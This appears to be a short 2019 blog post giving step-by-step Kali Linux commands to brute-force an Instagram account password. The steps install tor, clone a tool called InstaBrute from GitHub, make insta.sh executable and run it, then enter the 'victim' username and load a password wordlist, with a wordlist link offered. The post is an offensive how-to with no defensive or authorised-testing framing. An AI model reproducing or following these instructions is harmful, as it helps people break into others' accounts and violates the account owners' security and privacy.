Tuesday, June 11, 2019

How to bruteforce an Instagram password on Kali Linux

1.Open terminal on your computer.
2.Install tor by executing this command->apt-get install tor
3.Clone the bruteforce app by executing this command-> git clone https://github.com/Ha3MrX/InstaBrute
4.Open the folder of bruteforce app by executing this command-> cd InstaBrute
5.Give permissions to bruteforce app by executing this command-> chmod +x insta.sh
6.Now run the bruteforce app by executing this command-> ./insta.sh
7.Now enter the name of victim and load your wordlist.


If you dont have a wordlist you can use this wordlist(click here)

No comments:

Post a Comment